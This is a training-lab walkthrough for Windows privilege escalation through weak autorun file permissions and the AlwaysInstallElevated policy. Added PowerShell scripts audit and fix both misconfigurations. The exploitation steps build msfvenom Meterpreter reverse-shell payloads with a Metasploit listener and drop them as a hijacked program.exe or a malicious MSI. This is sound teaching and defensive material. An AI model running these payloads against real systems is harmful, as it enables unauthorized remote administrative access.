Windows PrivEsc Arena
Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are user:password321
Connecting to TryHackMe network
To complete this room and access the vulnerable Windows machine, you need to first connect to TryHackMe's VPN. If you've not done this before, first complete the OpenVPN room and learn how to connect.
Deploy the vulnerable machine
This room will teach you a variety of Windows privilege escalation tactics, including kernel exploits, DLL hijacking, service exploits, registry exploits, and more. This lab was built using Sagi Shahar's privesc workshop (https://github.com/sagishahar/lpeworkshop) and is used as part of The Cyber Mentor's Windows Privilege Escalation Udemy course (http://udemy.com/course/windows-privilege-escalation-for-beginners).
All tools needed to complete this course are on the user desktop (C:\Users\user\Desktop\Tools).
Let's first connect to the machine. RDP is open on port 3389. Your credentials are:
username: user
password: password321
For any administrative actions you might take, your credentials are:
username: TCM
password: Hacker123
- Deploy the machine and log into the user account via RDP
- Open a command prompt and run 'net user'. Who is the other non-default user on the machine?
Registry Escalation - Autorun
Detection
Windows VM
- Open command prompt and type:
C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
- In Autoruns, click on the 'Logon' tab.
- From the listed results, notice that the "My Program" entry is pointing to "C:\Program Files\Autorun Program\program.exe".
- In command prompt type:
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
- From the output, notice that the "Everyone" group has "FILE_ALL_ACCESS" permission on the "program.exe" file.
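The same check as the Autoruns and accesschk steps above, written as a PowerShell audit script. This is an added example, not part of the room or of Sagi Shahar's workshop; the function names are mine, and it assumes the "My Program" entry is registered in one of the standard HKLM Run keys listed at the top. It reports every autorun binary (or the folder containing it) on which Everyone, Users or Authenticated Users hold write-type rights, which is exactly the ACL defect this escalation relies on, so the same script run from an ordinary user session is a useful periodic check on any host.

```powershell
# Added audit script, not part of the TryHackMe room or Sagi Shahar's workshop.
# Lists Run-key entries and flags binaries (or their folders) that low-privileged
# principals can modify. Assumed: "My Program" lives in one of these Run keys.
$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
)
# Principals whose write access on an autorun target is a finding
$WeakPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
# Rights that let the holder replace or alter the file (or its parent folder)
$WriteMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
# Provider metadata that Get-ItemProperty attaches to every result
$ProviderProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

function Get-AutorunBinaryPath {
    param([string]$CommandLine)
    # Extract the executable from a Run value. Handles both
    #   "C:\Program Files\Autorun Program\program.exe" /arg   and   C:\x\y.exe /arg
    $cmd = $CommandLine.Trim()
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
    }
    $m = [regex]::Match($cmd, '^(.+?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $cmd
}

function Get-WeakAces {
    param([string]$Path)
    # Allow ACEs that grant a weak principal write-type rights on $Path.
    # Generic rights (GENERIC_ALL and friends) are not decoded by the mask;
    # accesschk remains the authority for those.
    $acl = Get-Acl -LiteralPath $Path
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($WeakPrincipals -contains $_.IdentityReference.Value) -and
        (($_.FileSystemRights -band $WriteMask) -ne 0)
    }
}

function Get-WritableAutorun {
    foreach ($key in $RunKeys) {
        if (-not (Test-Path $key)) { continue }
        $entry = Get-ItemProperty -Path $key
        foreach ($prop in $entry.PSObject.Properties) {
            if ($ProviderProps -contains $prop.Name) { continue }
            $exe = Get-AutorunBinaryPath -CommandLine ([string]$prop.Value)
            if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }
            # Check the binary itself and the folder that contains it
            foreach ($target in @($exe, (Split-Path -Parent $exe))) {
                foreach ($ace in (Get-WeakAces -Path $target)) {
                    New-Object PSObject -Property @{
                        Key       = $key
                        Entry     = $prop.Name
                        Target    = $target
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights.ToString()
                    }
                }
            }
        }
    }
}

# Usage: on the room VM this should surface "My Program" with Everyone
# holding FullControl on program.exe.
Get-WritableAutorun | Format-Table Entry, Target, Principal, Rights -AutoSize
```

The fix for a real finding is the ACL, not the autorun entry: remove the write rights for Everyone and Users on the binary and its folder (program files should be writable only by Administrators and SYSTEM), then re-run the script to confirm it reports nothing.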
Exploitation
Kali VM
- Open command prompt and type:
msfconsole
- In Metasploit (msf > prompt) type:
use multi/handler
- In Metasploit (msf > prompt) type:
set payload windows/meterpreter/reverse_tcp
- In Metasploit (msf > prompt) type:
set lhost [Kali VM IP Address]
- In Metasploit (msf > prompt) type:
run
- Open an additional command prompt and type:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
- Copy the generated file, program.exe, to the Windows VM.
Windows VM
- Place program.exe in 'C:\Program Files\Autorun Program'.
- To simulate the privilege escalation effect, log off and then log back on as an administrator user.
Kali VM
- Wait for a new session to open in Metasploit.
- In Metasploit (msf > prompt) type:
sessions -i [Session ID]
- To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid
- Click 'Completed' once you have successfully elevated your privileges on the machine
Registry Escalation - AlwaysInstallElevated
Detection
Windows VM
- Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
- From the output, notice that the "AlwaysInstallElevated" value is 1.
- In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
- From the output, notice that the "AlwaysInstallElevated" value is 1.
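A PowerShell equivalent of the two reg query steps above, with the remediation alongside. This is an added example and not part of the room: the function and variable names are mine, and the MsiInstaller event IDs in the last function are my assumption about where installs performed through this policy are recorded. The point the script makes explicit is that the policy is only abusable when both the HKLM and the HKCU value are 1; a single 1 is still a misconfiguration to fix.

```powershell
# Added check and remediation, not part of the TryHackMe room.
$InstallerPolicyKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedValue {
    param([string]$Key)
    # Returns the DWORD value, or $null when the key or value is absent
    # (absent means "policy not configured", which is the secure default)
    if (-not (Test-Path $Key)) { return $null }
    $item = Get-ItemProperty -Path $Key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.AlwaysInstallElevated
}

function Test-AlwaysInstallElevated {
    $machine = Get-AlwaysInstallElevatedValue -Key $InstallerPolicyKeys[0]
    $user    = Get-AlwaysInstallElevatedValue -Key $InstallerPolicyKeys[1]
    New-Object PSObject -Property @{
        MachineValue = $machine
        UserValue    = $user
        # Both must be 1 for msiexec to install an arbitrary package as SYSTEM
        Exploitable  = (($machine -eq 1) -and ($user -eq 1))
    }
}

function Disable-AlwaysInstallElevated {
    # Remediation: set both values to 0. Writing the HKLM key needs an
    # administrative session (the TCM account in this room).
    foreach ($key in $InstallerPolicyKeys) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
    }
}

function Get-RecentMsiInstalls {
    param([int]$Hours = 24)
    # Assumption: Windows Installer logs to the Application log under the
    # MsiInstaller provider; 1033 (product installed) and 11707 (installation
    # completed) are the events to review after suspected abuse of this policy.
    Get-WinEvent -FilterHashtable @{
        LogName      = 'Application'
        ProviderName = 'MsiInstaller'
        Id           = 1033, 11707
        StartTime    = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

# Usage: on the room VM both values are 1, so Exploitable should be True.
Test-AlwaysInstallElevated | Format-List
```

Because the HKCU half is per user, a domain-wide audit has to evaluate the user policy in the context of each logged-on user (or inspect the GPO that sets it) rather than only the machine key; the machine key on its own reports half the picture.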
Exploitation
Kali VM
- Open command prompt and type: msfconsole
- In Metasploit (msf > prompt) type: use multi/handler
- In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
- In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
- In Metasploit (msf > prompt) type: run
- Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
- Copy the generated file, setup.msi, to the Windows VM.
Windows VM
- Place 'setup.msi' in 'C:\Temp'.
- Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi
Enjoy your shell! :)